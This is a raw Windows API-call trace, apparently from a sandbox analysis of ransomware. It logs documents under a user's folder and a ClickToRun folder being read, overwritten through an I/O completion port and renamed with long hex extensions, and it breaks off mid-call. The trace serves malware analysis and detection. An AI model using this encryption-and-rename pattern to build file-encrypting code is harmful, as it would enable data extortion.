lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\dpKllgf2Wvl9L.pps.BA038E1F0AFF9C29C997130EC8D8A87CA10444F79315C846D9CA9C887BA83A7D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\dpKllgf2Wvl9L.pps.BA038E1F0AFF9C29C997130EC8D8A87CA10444F79315C846D9CA9C887BA83A7D" [0124.183] GetProcessHeap () returned 0x600000 [0124.183] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x152) returned 0x6f2530 [0124.183] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x6f2530, Length=0x152, FileInformationClass=0xa) returned 0x0 [0124.184] CloseHandle (hObject=0x31c) returned 1 [0124.185] GetProcessHeap () returned 0x600000 [0124.185] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.185] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.188] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.188] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.189] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0124.189] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\MkuxZMma_cNUC_9MvGev.xlsx", lpString2=".550E1E145C192FB5D7AE5A1FA9F1060F5854E8C68E599EE0399B7144294E9C13" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\MkuxZMma_cNUC_9MvGev.xlsx.550E1E145C192FB5D7AE5A1FA9F1060F5854E8C68E599EE0399B7144294E9C13") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\MkuxZMma_cNUC_9MvGev.xlsx.550E1E145C192FB5D7AE5A1FA9F1060F5854E8C68E599EE0399B7144294E9C13" [0124.189] GetProcessHeap () returned 0x600000 [0124.189] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x162) returned 0x315f360 [0124.190] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x315f360, Length=0x162, FileInformationClass=0xa) returned 0x0 [0124.191] CloseHandle (hObject=0x31c) returned 1 [0124.191] GetProcessHeap () returned 0x600000 [0124.191] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.191] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.194] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.194] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.195] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0124.196] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\V24qPsKNM.xlsx", lpString2=".D89B0FCC816F5FD41245BC7E1EB151E8D1F1E84EC5147262233A6E403B3AD24B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\V24qPsKNM.xlsx.D89B0FCC816F5FD41245BC7E1EB151E8D1F1E84EC5147262233A6E403B3AD24B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\V24qPsKNM.xlsx.D89B0FCC816F5FD41245BC7E1EB151E8D1F1E84EC5147262233A6E403B3AD24B" [0124.196] GetProcessHeap () returned 0x600000 [0124.196] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x14c) returned 0x6f2690 [0124.196] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x6f2690, Length=0x14c, FileInformationClass=0xa) returned 0x0 [0124.197] CloseHandle (hObject=0x31c) returned 1 [0124.197] GetProcessHeap () returned 0x600000 [0124.197] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.198] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.204] ReadFile (in: hFile=0x334, lpBuffer=0x3360140, nNumberOfBytesToRead=0x3400, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.205] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.205] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0124.206] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\34K1b7f7WFd2prM.odt", lpString2=".FB642DE39F76D9E000BA87018A147C5D54C67D334D2EE103BC2753A832529D7C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\34K1b7f7WFd2prM.odt.FB642DE39F76D9E000BA87018A147C5D54C67D334D2EE103BC2753A832529D7C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\34K1b7f7WFd2prM.odt.FB642DE39F76D9E000BA87018A147C5D54C67D334D2EE103BC2753A832529D7C" [0124.206] GetProcessHeap () returned 0x600000 [0124.206] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17e) returned 0x6d5978 [0124.206] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2b3ff60, FileInformation=0x6d5978, Length=0x17e, FileInformationClass=0xa) returned 0x0 [0124.207] CloseHandle (hObject=0x334) returned 1 [0124.207] GetProcessHeap () returned 0x600000 [0124.207] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.208] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.211] ReadFile (in: hFile=0x334, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.212] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.213] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0124.213] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\bm6qnx1dPRVSkB-soihF.doc", lpString2=".A9841E805A9C1629077AFB1E5EFEA7720AEE619887A6E3CBD93521162D5DCD05" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\bm6qnx1dPRVSkB-soihF.doc.A9841E805A9C1629077AFB1E5EFEA7720AEE619887A6E3CBD93521162D5DCD05") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\bm6qnx1dPRVSkB-soihF.doc.A9841E805A9C1629077AFB1E5EFEA7720AEE619887A6E3CBD93521162D5DCD05" [0124.213] GetProcessHeap () returned 0x600000 [0124.213] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x188) returned 0x314f378 [0124.213] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2b3ff60, FileInformation=0x314f378, Length=0x188, FileInformationClass=0xa) returned 0x0 [0124.215] CloseHandle (hObject=0x334) returned 1 [0124.215] GetProcessHeap () returned 0x600000 [0124.215] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.216] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.221] ReadFile (in: hFile=0x334, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.221] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.222] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0124.223] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\oL3boW.pps", lpString2=".24B28A641DB6D7261044B544FF031A8656F9A17B8CD0577097E833F6EC16B802" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\oL3boW.pps.24B28A641DB6D7261044B544FF031A8656F9A17B8CD0577097E833F6EC16B802") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\oL3boW.pps.24B28A641DB6D7261044B544FF031A8656F9A17B8CD0577097E833F6EC16B802" [0124.223] GetProcessHeap () returned 0x600000 [0124.223] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16c) returned 0x315ec08 [0124.223] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2b3ff60, FileInformation=0x315ec08, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0124.224] CloseHandle (hObject=0x334) returned 1 [0124.225] GetProcessHeap () returned 0x600000 [0124.225] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.225] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.228] ReadFile (in: hFile=0x334, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.228] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.229] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0124.229] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\PK_RE.rtf", lpString2=".2E26687CC6B231677633ADB24EE593C6871582BE20C925D6DA0A9AED04EB827C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\PK_RE.rtf.2E26687CC6B231677633ADB24EE593C6871582BE20C925D6DA0A9AED04EB827C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\PK_RE.rtf.2E26687CC6B231677633ADB24EE593C6871582BE20C925D6DA0A9AED04EB827C" [0124.229] GetProcessHeap () returned 0x600000 [0124.229] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16a) returned 0x315fab8 [0124.230] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2b3ff60, FileInformation=0x315fab8, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0124.231] CloseHandle (hObject=0x334) returned 1 [0124.231] GetProcessHeap () returned 0x600000 [0124.231] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.231] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.329] ReadFile (in: hFile=0x334, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.329] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.336] WriteFile (in: hFile=0x33c, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.336] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.597] ReadFile (in: hFile=0x33c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0124.597] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.661] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.661] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.669] WriteFile (in: hFile=0x31c, lpBuffer=0x338e098, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 0x0 [0124.669] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.679] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.679] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.685] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.685] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.690] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0124.691] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.699] WriteFile (in: hFile=0x334, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.700] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.712] WriteFile (in: hFile=0x334, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.713] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.722] WriteFile (in: hFile=0x334, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x4200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.722] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.732] WriteFile (in: hFile=0x334, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.733] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.741] WriteFile (in: hFile=0x334, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.742] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.983] ReadFile (in: hFile=0x32c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x6000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.985] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0124.987] WriteFile (in: hFile=0x33c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x4c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0124.987] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0125.573] ReadFile (in: hFile=0x32c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x6200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0125.573] GetQueuedCompletionStatus (CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff) Thread: id = 124 os_tid = 0x28c [0091.022] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0104.781] ReadFile (in: hFile=0x310, lpBuffer=0x6d54c0, nNumberOfBytesToRead=0x5600, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b5388 | out: lpBuffer=0x6d54c0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b5388) returned 1 [0104.782] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0104.782] WriteFile (in: hFile=0x310, lpBuffer=0x6d54c0, nNumberOfBytesToWrite=0x5600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b5388 | out: lpBuffer=0x6d54c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b5388) returned 0x0 [0104.791] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0104.792] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x2c7ff70) returned 0x0 [0104.794] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\stream.x86.en-us.man.dat", lpString2=".B52A6CC8FB7587F444C47DF3B494EA273D8CB96D932F5714F89DEFF12500AF29" | out: 